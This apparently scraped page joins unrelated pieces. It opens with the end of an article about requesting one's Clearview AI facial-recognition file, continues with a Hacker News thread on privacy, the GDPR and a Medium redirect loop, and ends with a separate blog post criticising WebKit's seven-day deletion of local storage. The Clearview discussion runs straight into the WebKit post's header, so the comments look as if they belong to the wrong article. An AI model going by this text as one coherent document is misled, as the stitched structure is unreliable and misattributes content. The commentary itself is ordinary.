To the company's credit, Clearview's system is not just a privacy pariah. It's also a breakthrough technology for investigating abhorrent crimes like child sexual abuse. As the Times reports, in one case Clearview helped to catch an alleged predator based on a reflected face in an unrelated photo posted at a gym. It's also a powerful tool for solving long-abandoned murders, and all manner of other cold cases.

Any legislation governing technologies like Clearview's should protect citizens from random searches. But at the same time, it should allow authorities to use services like Clearview when their use is justified.

Luckily, in the United States, we have a document that deals with achieving the proper balance between protecting society and respecting the rights of individuals. It's called the Constitution.

If searches on Clearview followed the same rules as other searches (like the requirement that police agencies obtain a warrant to perform them), this would be a huge step toward protecting the privacy of innocent citizens. Crucially, it would still allow investigators to use the system to solve serious crimes just as they currently use court-authorized searches to investigate suspects.

Until such legislation is passed, the field of facial recognition is essentially the Wild West. Companies can gather nearly any data they want about you, and use it for nearly any purpose.

As with any issue involving privacy, until strong legislation is in place, it's up to us as citizens to stay informed, and to protect our own rights. For Californians - and citizens of the myriad states and countries developing their own privacy laws - we now have powerful tools in our arsenal to do just that.

Rather than waiting for legislation to arrive, leverage these tools today to find out what Clearview and other corporations know about you. Then decide what you want to remove, amend, or leave in place.

The power to control data has traditionally rested with big companies. But it's increasingly shifting into our hands. Only through our own vigilance and action can we ensure that we understand and control the data gathered about us.




All Comments: [-] | anchor

DeathArrow(10000) 3 days ago [-]

They are using copyrighted images. What if 1,000 copyright owners decide to sue them for $100,000 each?

Kovah(4302) 3 days ago [-]

One thing you should be very careful about is licensing. If you post photos on Facebook or Instagram, you automatically grant them a license to redistribute the photo and share it with others. And these 'others' can include Clearview. So, Clearview could have a contract with Facebook which legally allows them to get and save those photos. So, you are still the copyright owner, but due to licensing Clearview can legally store and use the photos.

About suing them if they would break copyrights: not sure about the US, but in Germany it wouldn't be that easy to actually sue them for such a high sum. You could argue that the company makes money by offering the search service, but there must be evidence that Clearview made that specific sum just with your photo(s), which is very unlikely.

LockAndLol(4341) 3 days ago [-]

I'm not entirely sure what's so shocking about public data, shared willingly by the person to the public, being used to identify the person. If the data weren't/hadn't been shared willingly, I'd definitely see that as a problem. Same thing as if the data were to have been gleaned from non-public sources e.g the person's private belongings or secured digital realms like private forums, password encrypted backups, private profiles, etc.

Cthulhu_(3977) 3 days ago [-]

It's about trust and permission. If I give e.g. a local news website permission to use my portrait, I do NOT implicitly give permission to Clearview, Google, Facebook, etc to use it for their own purposes.

I mean it's implicitly known that anything you post on the internet is public property, but legally that is not the case. Portrait law (at least in my country). You can't just take someone's portrait and use it for your own gains.

samsquire(3969) 3 days ago [-]

Ideally we live in a society where not being anonymous is not such a big risk.

But governments change, the data is still around to be abused.

This is what disturbs me. Is how data can be abused in the future.

Cthulhu_(3977) 3 days ago [-]

Exactly. Very current affairs: governments are looking into getting location data from phone networks, apps, phone manufacturers to determine whether people are sticking to the curfews. And this change in perspective happened real fast.

Does the end justify the means? A pandemic like this is the ideal chance for a government to set up emergency measures like martial law, while the people themselves are too busy trying to look out for themselves and their family to be able to protest it.

Of course, anyone with half a brain already knew that unlimited data gathering, including location or personal information, was a bad thing.

nojvek(4032) 3 days ago [-]

I'm pretty sure ICE is already using that to find potential targets that are not residents.

Most non technical people don't understand how powerful technology is.

chii(3786) 3 days ago [-]

> not being anonymous is not such a big risk.

the world has always been anonymous because of the lack of capability to track large amounts of data - until recently.

Anonymity allows you safety from anyone who seeks to prey on you. I think that safety needs to be maintained. People stupidly put photos of themselves online, then face tag their friends. This allows third parties to identify your friends and circles, and that's dangerous. All relationships should be reciprocal.

duluca(10000) 3 days ago [-]

This nails it. It's not the present view of you that someone might get, but it's the fact that they can roll back the clock on you and re-interpret anything you did or said or anywhere you went. Digging up some ancient tweet is somewhat analogous to it, but it cuts way deeper when you start thinking about every moment of your life. On the flip side, if you're just living your life OpSec feels overkill...

taneq(10000) 3 days ago [-]

Yep. 'I trust this entity with my data' is absolutely not an argument to be lax with your privacy.

Take Pebble for example. They had a very invasive privacy policy and reserved the right to upload pretty much anything from your phone via the companion app, but they were a cool hacker-friendly hardware startup and a lot of people trusted them.

Years down the track they ran out of runway (the ugly side of 'unicorn or bust' venture capital but that's another rant) and were bought out by Fitbit. Meh, Fitbit seemed pretty good with privacy too so that's alright, I guess?

Now Google's bought Fitbit and potentially has a bunch of very personal, private data on everyone who originally trusted Pebble.

lloeki(4079) 3 days ago [-]

> This is what disturbs me: how data can be abused in the future.

The general 1984-style dystopia vision is that there's a government change for the worse and you could be SWATted out of the blue.

The most probable one is that this kind of tool would be used in far less obvious, if at all visible, ways.

In that situation some kind of honeypot/canary strategy would be nice to reveal shady use but I can't seem to come up with a realistic one.

koolba(634) 3 days ago [-]

This website does some crazy redirect loop between medium.com and the subdomain when opened without JS. How is that even possible?

ev1(10000) 3 days ago [-]

Server-side redirect that kicks in when the tracking cookies haven't been set by JS. Advertising.com blogs (AOL?) do the same thing.

saagarjha(10000) 3 days ago [-]

It didn't for me. (It did, however, make the content of the page load roughly two orders of magnitude faster.)

arkadiyt(2583) 3 days ago [-]

Also running into this issue.

ehnto(4324) 3 days ago [-]

Potentially done with an http-equiv meta tag hidden inside a noscript tag:

    <noscript><meta http-equiv="refresh" content="0; url=http://example.com/"></noscript>
Cyykratahk(10000) 3 days ago [-]

I had the same issue. Found it was because I had set Firefox to block all cookies for medium.com (probably to get around the article limit).

nieve(4318) 3 days ago [-]

Nothing magic, they're just sending an HTTP 302 redirect if they don't see a cookie. If you hit it with wget you'll see two 302s, one of them with the old 'Moved Temporarily' text and the other with 'Found'. I'm not sure why you only get two with wget; possibly user-agent sniffing. Tracing with Firefox's dev tools I see an initial JS redirect, but that may be a bug, since I've got JavaScript disabled for medium. Alternatively it's a bug in NoScript, and that's not good. Either way they'll toss a 302 with no JS at all.

shakna(2871) 3 days ago [-]

It returns a 302 header with this location:

https://medium.com/m/global-identity?redirectUrl=https%3A%2F...

Which then sends another location of:

https://onezero.medium.com/i-got-my-file-from-clearview-ai-a...

Which just ends up bouncing you back and forth, unless JS is allowed to percolate through. However, there is some useragent sniffing happening, so the exact set of headers changes.
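
A minimal sketch of tracing such a chain yourself (TypeScript on Node 18+, whose fetch exposes the Location header when redirects are handled manually; the URL below is a placeholder):

    // Follow redirects manually and print each hop, roughly what wget shows.
    async function traceRedirects(url: string, maxHops = 10): Promise<void> {
      for (let hop = 0; hop < maxHops; hop++) {
        const res = await fetch(url, { redirect: "manual" });
        console.log(res.status, url);
        const location = res.headers.get("location");
        if (!location) return; // no Location header: the chain ends here
        url = new URL(location, url).toString(); // resolve relative redirects
      }
      console.log("gave up: possible redirect loop");
    }

    traceRedirects("https://example.com/some-article").catch(console.error);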

Rafuino(3790) 3 days ago [-]

I submitted an info request about 2 months ago now, and I haven't heard a word from these jackasses

fishmaster(10000) 3 days ago [-]

Keep going. They risk being fined by not answering.

martin-adams(4143) 3 days ago [-]

So will we see a new normal where, if you delete your data, you're considered suspicious because it looks like you might be hiding something?

Personal data may soon become the same as a credit score. No data, high risk.

fredsanford(10000) 3 days ago [-]

This is already here with Google if you use uBlock or uMatrix. Endless captchas...

'We detected suspicious blah blah blah'

air7(3825) 3 days ago [-]

The thorny issue here is that this is all public information put forth willingly by people. These are not leaked medical records. In a way these abilities are like a person saying 'hmm, isn't that the guy from that thing a while back?' What are the limits of what one is allowed to do with public data? I don't have a clear opinion.

njkleiner(10000) 3 days ago [-]

> These are not leaked medical records. In a way these abilities are like a person saying 'hmm isn't that the guy from that thing a while back?'

That's why I don't think there is much of a point in trying to prevent people (e.g. by law) from crawling and using data in this fashion.

I feel like the only reasonable solution here would be to force these companies to rebuild their databases by legally limiting the lifetime of such data.

That way people have a chance to remove themselves from the database by changing/deleting their online profiles without having to use legal measures like GDPR requests. People wouldn't even have to be aware of any individual database they might be part of; they would be removed from it automatically at some point.

Another benefit of this would be that the pure cost of constantly re-crawling a giant dataset could act as a limiting factor and therefore prevent abuse.
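
A tiny sketch of that expiry idea (all names and the retention window here are hypothetical, purely illustrative):

    // Records carry a crawl timestamp; anything older than a mandated
    // maximum age is purged, so people drop out of the index automatically.
    interface FaceRecord {
      imageUrl: string;
      crawledAt: number; // epoch milliseconds
    }

    const MAX_AGE_MS = 180 * 24 * 60 * 60 * 1000; // hypothetical 180-day limit

    function purgeExpired(records: FaceRecord[], now = Date.now()): FaceRecord[] {
      return records.filter((r) => now - r.crawledAt < MAX_AGE_MS);
    }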

Skunkleton(10000) 3 days ago [-]

The data was shared willingly within the understanding of the person making that decision. Do people really understand how much data in their day to day life they have "willingly" shared?

gentleman11(10000) 3 days ago [-]

This public information includes security cam footage. It's not up to us whether people film us; the cameras are everywhere.

Talyen42(10000) 3 days ago [-]

I think about it like this: what would happen if you did this manually, at the same scale? If I went around asking every single person you've ever met if they could provide any pictures in which you're in the background, and collected them all and sold them as a collection, i'd be borderline harassing/stalking you. Not necessarily straight up illegal, but maybe in some ways? That's what this is, digitally.

davnn(4287) 3 days ago [-]

So the difference between this and Google's reverse image search is that Google's matching algorithm is worse (probably because it doesn't include facial recognition)?

Well, public images are public, and I don't think banning such a service would prevent governments from implementing something like this... the technological barriers are getting lower and lower.

sixstringtheory(4344) 3 days ago [-]

You can presumably hold government officials accountable, but you can't vote out the CEO of Clearview.

40four(4332) 3 days ago [-]

I used to think some of my peers were being overly cautious by purposely trying to obfuscate their online profile. Back in the day, I couldn't care less about putting in effort to try to protect my online privacy. I have slowly but surely come to see the light. Now it's at the forefront of my mind at all times.

Learning about this company (and I imagine other unknown entities are doing the same) has encouraged me to get more aggressive.

I think I will start to try some shenanigans I learned from a friend. I plan on replacing my online profile pics with random grabs from https://www.thispersondoesnotexist.com/. It might not make much of a difference for the old stuff; maybe I can successfully request a data deletion as the article suggests. At least it will introduce a little bit of noise for the AI overlords :)

Cthulhu_(3977) 3 days ago [-]

I grew up with 'don't use your real name on the internet' in the back of my head; this was before kids got internet safety classes.

5-10 years later, Facebook came up with their real-name policy and started asking people to snitch on their friends if they used a fake name. Google, and mainly YouTube, came with a real-name policy as well: on the one hand for Google+, on the other to try to fight comment abuse, the theory being that people are more hesitant to be a dick on the internet if they use their real name.

But people got used to that real fast, and since there were few consequences anyway, it didn't work.

People have valid reasons to use a fake name on the internet; government and business surveillance is a big one. Abusive or stalker exes are another. So is having an alternate persona (e.g. entertainers, authors) that people are trying to hide from an unaccepting or abusive family, or from society at large.

stiray(4004) 3 days ago [-]

Replacing pictures won't help (they already have them); a GDPR request for deletion might work better, but on the other hand you also give them your confirmed identity. With companies as shady as this one, they might just set a flag in their database and add your document data to it.

As you have figured out on your own, the public should have listened to the people who had been warning about this for more than a decade, instead of making fun of them (tin foil hat, ...).

And if anyone thinks that Google and Facebook don't have their own versions of Clearview, think again. Any form of online presence under your real name has to be minimized, and it is doable, but it would mean stopping (or should I say curing) all the narcissistic pushes to share, refraining from giving out any personal information on the internet (no, you won't secure my account by having my phone number; provide me TOTP if security is really the reason), and keeping that information from being stolen by apps (application firewalls, sending back fake data, and not using any Google applications, including removing their preinstalled spyware by rooting the phone).

I can guarantee you that you won't be missing anything relevant (I have been doing it for more than a decade). But. Will you do that? Can you do that? Do you want to do that? Most people would rather just take the blue pill.

JDulin(3913) 3 days ago [-]

Just for the record, the journalist who broke the story on Clearview noted that Clearview AI has specifically demonstrated it isn't fooled by thispersondoesnotexist.com:

https://twitter.com/kashhill/status/1218542846694871040?s=20

You won't be giving them any info on you, but you won't be confounding them either.

wideasleep1(10000) 3 days ago [-]

Starting in the early 90's, 'everyone's a dog on the internet', so my profile pics were dogs. One buzzed evening, I changed a few to Fabio. Good luck, Fabio.

api(1134) 3 days ago [-]

Your peers were being rational, but it's a drop in the bucket. I've come to the conclusion that privacy can only be protected with legislation. There is too much surface area to protect for the average person to police their own data trail online. Even experts have a tough time doing it. You'd have to abstain from virtually everything, and even then you can't keep other people from posting pictures of you, tagging you, etc.

This isn't a technical issue. It's a political issue.

david-cako(10000) 3 days ago [-]

I too am extremely opposed to any and all non-consenting invasions of digital privacy (i.e., the problem isn't the known-known of what you upload, but the hidden implications of it), but on the contrary, I make a disciplined effort to make my digital fingerprint reflect my actual views and identity. Whatever time capsule my digital identity ends up in, I want it to be as accurate and beautiful as possible.

This includes my avid support of corporations which make good faith efforts to defend natural rights and freedoms, and my vehement opposition to corporate/political nonsense that does not represent, in good faith, the interests of humanity and nature. "A reasonable amount" of surveillance is an essential aspect of society, but it SHOULD be considered invasive, and should never be invisible. I suspect that there will be BS metrics to evaluate how "consenting" a given individual is to NSA/Clearview type behavior, and I would hope that I am casting a shield of protection. I feel bad about the fact that an element of bitterness is necessary to be resilient. I know no other way than truth.

I truly act as if AI is learning from me, and believe that there are long reaching and metaphysical effects to all actions.

sxp(2387) 3 days ago [-]

The article is missing a link to the Clearview forms to request a copy of the data or request deletion: https://clearview.ai/privacy/requests

yeswecatan(4146) 3 days ago [-]

Thank you. I was having a hard time finding this.

buza(4033) 3 days ago [-]

Even more incredible is that the opt out link requests a clear view of your face to proceed.

_fullpint(10000) 3 days ago [-]

It's absolutely wild that for anyone who's not a resident of California or the EU/UK, there isn't a way to request anything other than specific images/links.

jiveturkey(4257) 3 days ago [-]

This is a case of 'never click 'opt-out' on spam'. Clearview is not to be trusted. One should not go through their process. They are not likely to delete the data, and if they have none, they are likely to create a profile for you.

Funes-(4283) 3 days ago [-]

Nobody should be posting their private data (pictures or videos, for instance) on a publicly accessible site if they want privacy. Look, if you want your relatives, friends, and even acquaintances to see whatever you want them to, just do it through a medium that allows for private communication. It's just common sense.

vharuck(3797) 3 days ago [-]

>It's just common sense.

Based on what and how people share online, the 'common' sense is an expectation of decency in not vacuuming data just because you can. You and I know that's silly, but that's not common sense.

drivebycomment(10000) 3 days ago [-]

A related thought experiment: what if Google or Bing built an image search service based on face recognition? If you don't like that idea, how about doing it only for celebrities and public figures? If you are OK with one but not the other, what would be a good line distinguishing them, and what guiding principle? If you are not OK with either, or OK with both, why?

The more I think about it, the more I lean toward allowing both, but I can see why people would not like it.

brandonmenc(3914) 3 days ago [-]

> If you are ok with one but not the other, what would be a good line distinguishing them and guiding principle?

Because celebrity by definition requires trading privacy for fame, and is almost always a decision.

We need a new legal classification for 'public, but not accessible by everyone in the world for the rest of time' information, which is what most regular people assume or desire for themselves.

jachee(10000) 3 days ago [-]

I wonder what would happen if I were to issue them a $5000/mo/piece retroactive license invoice for any/all use of my name/likeness/etc for their profit.

I wonder what would happen if everyone did.

Cthulhu_(3977) 3 days ago [-]

A class-action suit that would probably last a couple of years and end in a settlement where the claimants, assuming they fill(ed) in forms x, y and z, would be entitled to at best a few hundred dollars.

See also the Equifax settlement. I'd say Equifax is the best / most recent example of something like this.

hedora(3864) 3 days ago [-]

I'd love to see a successful copyright case along these lines.

I wonder if this can be combined with adding a "terms of service" to your FB profile.

Corporations have perverted contract law to the point where their terms of service are binding even if you never read them, or are even aware of them.

Turnabout is fair play, right?

fg6hr(10000) 3 days ago [-]

It's interesting how collecting or distributing music files is a grave crime, and corporations can take down anything they don't like with a half-assed DMCA request with no repercussions for 'mistakes'; yet a person's face image doesn't belong to that person, and the same corporations can safely collect and distribute those images for profit.

TazeTSchnitzel(2254) 3 days ago [-]

> but a person's face image doesn't belong to that person

Copyright applies there too, and if you sued them for it, it's not inconceivable you might win.

ArnoVW(10000) 3 days ago [-]

Actually, in Europe it is illegal to collect personally identifiable information of people without their consent. GDPR and all that.

I am surprised they haven't been fined out of existence yet.

davedx(1829) 3 days ago [-]

YouTube takes this one step further, to the ridiculous extreme that if you are live-streaming a DJ set, it censors your stream in real time whenever it detects a copyrighted song, i.e. a good 1/3 of your stream. It doesn't need a DMCA request; it does it willingly.

YouTube is so horrible now for content creation, I don't understand how content creators are able to post anything anymore without it being smashed by the copyright automation.

heavyset_go(4321) 3 days ago [-]

> but a person's face image doesn't belong to that person and the same corporations can safely collect and distribute these images for profit.

The irony is that companies like Facebook, Twitter, etc. are really bothered when another business scrapes profiles to mine the data uploaded to those sites.

I wouldn't be surprised to find out that Clearview gets sued by one of these companies for 'stealing' content they host and violating the licenses to user content they grant themselves via their ToS.

Mirioron(10000) 3 days ago [-]

It goes even further than corporations being able to request things from being taken down. Kim Dotcom's house was raided by the FBI in New Zealand over this. He isn't even an American!

lonelappde(10000) 3 days ago [-]

It's because you haven't shown a dollar value of damages.

eurekin(10000) 3 days ago [-]

Honest question: why is the author so shocked, given that all the information was public or was published by himself?

endorphone(3093) 3 days ago [-]

Probably because it was in disparate places and it seemed unlikely that someone would, or even could, aggregate and correlate it all with enough accuracy to not be junk.

There is a difference, or at least there conceptually was, between posting your life story and all of your thoughts on your central LinkedIn profile, versus having two dozen different 'blogs' of sorts over the years, Steam accounts, Facebook, MySpace, Flickr, and usenet groups that come and go and that we think of as ephemeral. When you see all of that stuff pulled together it could be deeply unsettling.

Of course that was foolish -- eventually networking, storage, and computation would allow for everything to be ingested, and facial identification would greatly assist in pulling it together -- but it seemed dystopian at the time.

Lio(2384) 3 days ago [-]

I think because the idea that someone you don't know and have no relationship with is systematically collating everything they can about you, is a bit like having a stalker.

You don't know why they're stalking you.

On the face of it it's for law enforcement in case you decide to commit a crime sometime in the future.

...or it could be so that shops can raise their prices when you walk in and the facial recognition picks you up.

...or it could be for a future employer to decide that the kind of bars you visit means that you're not the right 'social fit' for a job.

...or it could be for... anything.

You have no control and that's the scary thing.

lolc(10000) 3 days ago [-]

Humans don't keep track of all the things that could be done. I know that what Clearview does is technically possible, but when I see it being done, it shocks me too.

battery_cowboy(10000) 3 days ago [-]

Private companies can do whatever immoral garbage they want, and in exchange for access to the data or the product they developed in an unethical manner, the government slaps them on the wrist, or does nothing, allowing it to get worse and worse and allowing them to assert more control over us.

Imagine the story when people find out this or another company has started scraping porn sites with facial recognition, gaining access to surveillance footage from Nest or Ring, or maybe even getting access to state and federal DOT cameras and real-time feeds from body cameras!

Facial recognition is going to need some regulation, ASAP.

nexuist(4119) 3 days ago [-]

> starts gaining access to surveillance footage from Nest or Ring, or maybe even gets access to state and federal DOT cameras and real time feeds from body cameras!

https://www.engadget.com/2020-03-04-banjo-ai-utah-law-enforc...

> The agreement gives the company real-time access to state traffic cameras, CCTV and public safety cameras, 911 emergency systems, location data for state-owned vehicles and more. In exchange, Banjo promises to alert law enforcement to 'anomalies,' aka crimes, but the arrangement raises all kinds of red flags.

> Banjo relies on info scraped from social media, satellite imaging data and the real-time info from law enforcement. Banjo claims its 'Live Time Intelligence' AI can identify crimes -- everything from kidnappings to shootings and 'opioid events' -- as they happen.

sergioisidoro(4244) 3 days ago [-]

Why are paywalled articles still allowed on HN front page? And why are people still upvoting them?

pjmlp(200) 3 days ago [-]

Because some of us agree that not everything is free beer and people that provide information also have bills to pay.

stagas(3419) 3 days ago [-]

Same frustration here, but this[0] did the job for me.

[0]: https://github.com/iamadamdev/bypass-paywalls-chrome

bencollier49(2707) 3 days ago [-]

Compiling profiles like this without consent is subject to massive fines under GDPR.

I find it extremely surprising that they would be responding to GDPR subject access requests, given that they appear to be ignoring the rest of it.

sdoering(1669) 3 days ago [-]

Not replying would get them in trouble even faster. So probably they hope to appease the one requesting the data.

thinkloop(3678) 3 days ago [-]

Bit of a rub that to request your messy, potentially erroneous, public profile, you have to give private, authenticated identification and contact information - basically the most valuable information they could want, dramatically increasing the value of your profile that you were so concerned about in the first place.

pqs(4303) 3 days ago [-]

I came here to make the same comment. I don't like what this company is doing, but the information is already public. People should know that anyone can read your public data and assemble it. It is not very different from living in a town. In a town, everyone knows public, and not so public, information about everyone. The police, or a private investigator, can always go and interrogate the butcher or the hairdresser and ask for information about you. They can also read the local gazette. The difference now, and it is not minor, is that the town is global.

Privacy starts with us not revealing our private information. That's why we have curtains at home. It is we who put the curtains on the windows.

minusSeven(10000) 3 days ago [-]

It's probably because, for Clearview, it's the only way to know that it is indeed you who is asking for information on yourself.

sixstringtheory(4344) 3 days ago [-]

Came here to say this. Do any of the privacy laws allow for deleting your profile without proving to the company who you are? Could you have the government make the request on your behalf? Sending Clearview your license sounds like confirming your credentials in a haveibeenpwned-like honeypot. It seems irresponsible for the author to even suggest that to readers. There should be other ways.

ardy42(4177) 3 days ago [-]

> Bit of a rub that to request your messy, potentially erroneous, public profile, you have to give private, authenticated identification and contact information - basically the most valuable information they could want, dramatically increasing the value of your profile that you were so concerned about in the first place.

The concept of being opted-in by default and being forced to authenticate yourself to opt out is getting more and more ridiculous by the day.

These systems need to be opt-in, and that requirement needs to be enforced by some kind of powerful government agency with the power to arrest and jail non-compliant operators. Anything less feels like it would end up being a complete surrender to companies like Clearview AI.

chippy(617) 3 days ago [-]

Would you help and use Clearview if it were being used in your government's strategy against coronavirus?

Would you volunteer your time to tag images with your friends and acquaintances, to help slow down the virus? To do otherwise would be immoral and lead to the death of thousands, right?

To those worried about that, it's just temporary. It would just last a few months and then you don't need to worry about it any more. This is a global war and we have to make sacrifices and take important actions.

toxicFork(10000) 3 days ago [-]

'It would just last a few months and then you don't need to worry about it any more.'

I heard about this before...

newswasboring(4240) 3 days ago [-]

Yes, I will. But only if assurances are made that all this work will be destroyed after the pandemic is over. I give my consent for one task, and after that task is over the data should not be used. It's the same as people being allowed to kill in war but not after. Although weapons are kept after wars, strict measures are in place to stop them from reaching unauthorized hands. These measures are not perfect, but they are really good, and in good faith they should be continuously improved.

dredmorbius(148) 3 days ago [-]

Yuval Noah Harari, 'The world after coronavirus'

https://www.ft.com/content/19d90308-6858-11ea-a3c9-1fe6fedcc...

Bruce Schneier, 'Emergency Surveillance During COVID-19 Crisis'

https://www.schneier.com/blog/archives/2020/03/emergency_sur...

I'd have very grave misgivings.

dabbledash(10000) 3 days ago [-]

No.

This isn't even a hard question.

cmarschner(4060) 3 days ago [-]

Given the 'right to be forgotten', shouldn't he be able to request that all his data be deleted?

erk__(10000) 3 days ago [-]

From the article:

> And remember that once you receive your data, you have the option to demand that Clearview delete it or amend it if you'd like them to do so.

shmageggy(3104) 3 days ago [-]

> For a few million dollars, nearly anyone with a startup background could likely build their own version of Clearview in less than a year.

Am I being naive, or is this being overly generous? What about this cannot be recreated with an off-the-shelf web scraper and a pretrained facial recognizer?

sdan(3361) 3 days ago [-]

You can even upload the scraped images to Google Photos (it does a boatload of AI classification).

Pretty much anyone with Python familiarity can do this.

manmal(4293) 3 days ago [-]

I think Clearview having indexed basically all public information about people gives them a serious advantage for face recognition and building up a network of relationships between people.

irjustin(10000) 3 days ago [-]

Maybe overly generous, maybe not. We shouldn't get stuck on the accuracy of the dollar amount. The point the author is trying to make is that there will always be a 'ClearView'.

So we need strong legislation around the use of this technology, especially when it comes to law enforcement, as opposed to trying to kill the idea itself, because that's unrealistic. Just as you said, you could start it from your laptop.

sullyj3(10000) 3 days ago [-]

Probably the scale.

PeterisP(10000) 3 days ago [-]

It's likely to cost you a few million dollars in hardware and multiple months to run your off-the-shelf web scraper and a pretrained facial recognizer on a very, very large number of images. There are a lot of images on the internet; bandwidth and compute are not free.

101404(10000) 3 days ago [-]

Why is there no arrest warrant against the managers and owners of Clearview here in the EU?

They are using PII of hundreds of millions of Europeans without written consent.

That alone should mean billions of euros in fines.

Nextgrid(3983) 3 days ago [-]

There is no arrest warrant for Google, Facebook or ad-network employees either, despite them violating the GDPR on a daily basis and at a very large scale.

Granted, the GDPR doesn't say anything about arresting offenders, but the companies should at least be investigated and fined, which isn't happening either.

The GDPR is a joke.

isoprophlex(4335) 3 days ago [-]

https://edpb.europa.eu/about-edpb/board/members_en

Europeans can find their national privacy boards here, and file complaints about Clearview through them.

dathinab(10000) 3 days ago [-]

Legal actions are currently in the process of being carried out, but it takes some time to clarify things.

For example, part of the pictures come from old, failed social networks which sold them, and whose terms and conditions (AGB) _might_ state that they can do so. Now it's questionable whether such terms are valid at all, but several points still need to be clarified:

- whether European citizens are affected (it's hard for that not to be the case)
- the exact legal status, as pictures might have been obtained legally before the GDPR
- ...
- also note that Clearview stores biometric data (derived from the images; without it, fast search/lookup would not be implementable)

So I would not be surprised if Clearview were required to delete all data for which it cannot be sure it's not from EU citizens, which I think would mean all data, given what they store and what they don't. Obviously they won't comply, and an EU-wide arrest warrant might follow, which is kinda useless if the person doesn't enter the EU. I highly doubt they will try an international warrant.

So practically it's unlikely that anything will change, except for the operators of Clearview being officially listed as 'potential' criminals (no arrest => no court => innocent until convicted).

manigandham(779) 3 days ago [-]

GDPR is EU law and does not cover American corporations. It relies entirely on foreign cooperation [1] to extend that reach internationally, which so far has been untested and is not likely to get any real support in the near term given the current economic situation.

1. https://gdpr.eu/article-50-countries-outside-of-europe-coope...

saturday14(10000) 3 days ago [-]

Because the general public doesn't care enough to raise a stink? Back when the Snowden story broke, I tried explaining its significance to a handful of my friends; all I got was a yawn. These are not dumb people, they are smart professionals (non-IT). Even so, I failed to get the point across to them.

It would require some serious education before the public wakes up to the dangers of private companies running amok with their data. Sad thing is, it is already too late. It is going to be very difficult to put a lid on this. This is a company that we (now) know about - how many are there silently working in the shadows that we don't know about?

mstolpm(3203) 3 days ago [-]

Investigations are on the way. Heise online writes (translated): 'Hamburg data protection officer takes action against Clearview. Following a complaint, data protection officer Johannes Caspar is investigating the US company Clearview AI, which specialises in automated facial recognition. [...]'

Source (in german): https://www.heise.de/newsticker/meldung/Gesichtserkennung-Ha...

microdrum(4048) 3 days ago [-]

Maybe because no one actually thinks that there is a privacy interest in public photos of his/her face that he/she posts on the public internet?

megaman821(3864) 3 days ago [-]

When it comes to information gathering, I have always assumed that if it is technically possible to do, then some agency in the government is doing it. So even if people were able to shame all of Clearview's customers into not using them, that wouldn't stop this type of information gathering from going on.

kick(284) 3 days ago [-]

Just because the government has nukes, doesn't mean citizens should have them. The government shouldn't have them, either, but there's not much citizens can do about that outside of revolt.

Meanwhile this company has been nothing but privacy abuses and lies to the public. If it isn't broken up by law, it will be interesting to see what the people do.

hcarvalhoalves(4173) 3 days ago [-]

Is it really that surprising, since all the photos are available on public sites? It seems this tool reveals the same as a Google search for the name would reveal.

MikeAmelung(10000) 3 days ago [-]

This guy's name is Tom Smith. Go ahead and pop that into Google and let me know how that turns out.

His name is about as generic as you could imagine for a white person. But they returned a bunch of images of HIM, and one Alexey Something-or-other, which could be his troll account.

Edit: the Alexey part is a joke, I'm sorry but I thought it was funny.

RandallBrown(3870) 3 days ago [-]

The only real concern I see is that it allows someone searching to go from photo to name very quickly.

wolco(3800) 3 days ago [-]

Is it me, or did anyone else find the availability of photos to be less than expected?

It is worrisome, but a Facebook could produce a lot more privacy-related connections from private photos no one knows existed. I guess I was expecting that... perhaps in the future Facebook will offer this service.

RandallBrown(3870) 3 days ago [-]

Almost all of those photos were from the guy's personal blog, and one wasn't even him.

I'd be way more worried if it was finding stuff like me in the background of someone else's photo in a crowded city or something like that.





Historical Discussions: WebKit will delete all local storage after 7 days (March 25, 2020: 695 points)

(696) WebKit will delete all local storage after 7 days

696 points 3 days ago by jlelse in 3747th position

ar.al | Estimated reading time – 4 minutes | comments | anchor

Apple just killed Offline Web Apps while purporting to protect your privacy: why that's A Bad Thing and why you should care

25 Mar 2020

Apple just threw the baby out with the bathwater by killing offline web apps (purportedly to protect your privacy).

Blocking third-party cookies, good. Killing offline web apps, bad.

On the face of it, WebKit's announcement yesterday titled Full Third-Party Cookie Blocking and More sounds like something I would wholeheartedly welcome. Unfortunately, I can't because the "and more" bit effectively kills off Offline Web Apps and, with it, the chance to have privacy-respecting apps like the prototype I was exploring earlier in the year based on DAT.

Block all third-party cookies, yes, by all means. But deleting all local storage (including Indexed DB, etc.) after 7 days effectively blocks any future decentralised apps using the browser (client side) as a trusted replication node in a peer-to-peer network. And that's a huge blow to the future of privacy.

But Apple cares about your privacy...

Do they, though?

If they care about your privacy, why is the Apple News app a sewer of surveillance capitalism? If they did care about your privacy, here's what they'd do:

  1. Implement all of the privacy protections they have in Safari in the Apple News app also.

  2. Allow content blockers like Better to protect your privacy in Apple News app.

Heck, they could even go further and ban apps from corporations like Facebook, Inc., and Alphabet, Inc., that have violating your privacy as the core tenet of their business model.

Instead, what do they do? They kill offline web apps.

You'd almost think they had an App Store to promote or something.

A reevaluation

In a blog post I wrote at the start of 2015 titled Apple vs Google on privacy: a tale of absolute competitive advantage, I said:

So riddle me this: if you have an absolute competitive advantage – if you have something that you can do that your competitors cannot – would you throw it away?

Only if you're an idiot.

And something tells me Tim Cook isn't an idiot.

Sadly, I was wrong.

Update (25 March, 9PM)

Looks like Apple updated their post (thanks for the heads up, Xerz!) to add the following:

A Note On Web Applications Added to the Home Screen

As mentioned, the seven-day cap on script-writable storage is gated on "after seven days of Safari use without user interaction on the site." That is the case in Safari. Web applications added to the home screen are not part of Safari and thus have their own counter of days of use. Their days of use will match actual use of the web application which resets the timer. We do not expect the first-party in such a web application to have its website data deleted.

If your web application does experience website data deletion, please let us know since we would consider it a serious bug. It is not the intention of Intelligent Tracking Prevention to delete website data for first parties in web applications.

Now I'm confused and have questions:

Take Jim Pick's excellent Collaborative Shopping List Built On Dat...

  1. If I use the app in Safari on iOS without adding it to Home Screen and leave it for seven days, will my shopping list be deleted?

  2. If I do the same thing on Safari for macOS (which doesn't have a Home Screen), will my shopping list be deleted?

I really hope this was just a badly-thought-out decision (this is your out, guys; take it) and that it will be reversed entirely.
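
(As a practical aside, a web app can at least ask the browser not to evict its data via the Storage API; a minimal sketch below. Whether Safari honors, or even exposes, navigator.storage.persist() is another question.)

    // Ask the browser to mark this origin's storage as persistent.
    async function tryToPersist(): Promise<void> {
      if (navigator.storage && navigator.storage.persist) {
        const granted = await navigator.storage.persist();
        console.log(granted ? "storage marked persistent" : "storage may still be evicted");
      } else {
        console.log("Storage API unavailable; data may be evicted");
      }
    }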

Andre Garzia has also written on the subject in a post titled Private client-side-only PWAs are hard, but now Apple made them impossible. Go read that one too.

